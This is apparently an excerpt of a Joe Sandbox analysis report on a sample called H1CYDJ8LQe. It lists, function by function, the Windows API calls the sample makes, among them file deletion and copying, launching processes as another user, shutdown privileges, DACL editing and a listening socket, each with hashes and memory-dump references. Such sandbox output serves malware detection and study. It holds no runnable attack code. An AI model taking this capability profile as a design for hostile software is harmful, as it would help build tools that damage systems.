• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
• GetProcessWindowStation.USER32 ref: 004463D1
• SetProcessWindowStation.USER32(00000000), ref: 004463DB
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
• _wcslen.LIBCMT ref: 00446498
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _wcsncpy.LIBCMT ref: 004464C0
• LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
• CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
• UnloadUserProfile.USERENV(?,?), ref: 00446555
• CloseWindowStation.USER32(00000000), ref: 0044656C
• CloseDesktop.USER32(?), ref: 0044657A
• SetProcessWindowStation.USER32(?), ref: 00446588
• CloseHandle.KERNEL32(?), ref: 00446592
• DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
• String ID: $@OH$default$winsta0
• API String ID: 3324942560-3791954436
• Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
• Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
• Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
• Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                              • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • _wcscat.LIBCMT ref: 0044BD94
                                                            • _wcscat.LIBCMT ref: 0044BDBD
                                                            • __wsplitpath.LIBCMT ref: 0044BDEA
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                            • _wcscpy.LIBCMT ref: 0044BE71
                                                            • _wcscat.LIBCMT ref: 0044BE83
                                                            • _wcscat.LIBCMT ref: 0044BE95
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                            • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 2188072990-1173974218
                                                            • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                            • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                            • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                            • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                            • FindClose.KERNEL32(00000000), ref: 00478924
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                            • __swprintf.LIBCMT ref: 004789D3
                                                            • __swprintf.LIBCMT ref: 00478A1D
                                                            • __swprintf.LIBCMT ref: 00478A4B
                                                            • __swprintf.LIBCMT ref: 00478A79
                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                            • __swprintf.LIBCMT ref: 00478AA7
                                                            • __swprintf.LIBCMT ref: 00478AD5
                                                            • __swprintf.LIBCMT ref: 00478B03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 999945258-2428617273
                                                            • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                            • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                            • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                            • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                            • __wsplitpath.LIBCMT ref: 00403492
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcscpy.LIBCMT ref: 004034A7
                                                            • _wcscat.LIBCMT ref: 004034BC
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                            • _wcscpy.LIBCMT ref: 004035A0
                                                            • _wcslen.LIBCMT ref: 00403623
                                                            • _wcslen.LIBCMT ref: 0040367D
                                                            Strings
                                                            • Unterminated string, xrefs: 00428348
                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                            • Error opening the file, xrefs: 00428231
                                                            • _, xrefs: 0040371C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                            • API String ID: 3393021363-188983378
                                                            • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                            • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                            • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                            • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                            • FindClose.KERNEL32(00000000), ref: 00431B20
                                                            • FindClose.KERNEL32(00000000), ref: 00431B34
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                            • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                            • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1409584000-438819550
                                                            • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                            • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                            • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                            • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                            • __swprintf.LIBCMT ref: 00431C2E
                                                            • _wcslen.LIBCMT ref: 00431C3A
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2192556992-3457252023
                                                            • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                            • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                            • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                            • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                            • __swprintf.LIBCMT ref: 004722B9
                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FolderPath$LocalTime__swprintf
                                                            • String ID: %.3d
                                                            • API String ID: 3337348382-986655627
                                                            • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                            • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                            • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                            • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                            • FindClose.KERNEL32(00000000), ref: 0044291C
                                                            • FindClose.KERNEL32(00000000), ref: 00442930
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                            • FindClose.KERNEL32(00000000), ref: 004429D4
                                                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                            • FindClose.KERNEL32(00000000), ref: 004429E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 2640511053-438819550
                                                            • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                            • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                            • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                            • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                            • GetLastError.KERNEL32 ref: 00433414
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 2938487562-3733053543
                                                            • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                            • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                            • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                            • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                            APIs
                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                              • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                              • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                            • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                            • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                            • CopySid.ADVAPI32(00000000), ref: 00446271
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 1255039815-0
                                                            • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                            • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                            • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                            • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 00433073
                                                            • __swprintf.LIBCMT ref: 00433085
                                                            • __wcsicoll.LIBCMT ref: 00433092
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                            • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                            • LockResource.KERNEL32(00000000), ref: 004330CA
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                            • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                            • LockResource.KERNEL32(?), ref: 00433120
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                            • String ID:
                                                            • API String ID: 1158019794-0
                                                            • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                            • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                            • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                            • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                            APIs
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                            • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                            • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                            • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                            • GetLastError.KERNEL32 ref: 0045D6BF
                                                            • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                            Strings
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                            • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                            • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                            • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _memmove$_strncmp
                                                            • String ID: @oH$\$^$h
                                                            • API String ID: 2175499884-3701065813
                                                            • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                            • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                            • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                            • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 0046530D
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                            • closesocket.WSOCK32(00000000), ref: 00465377
                                                            • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
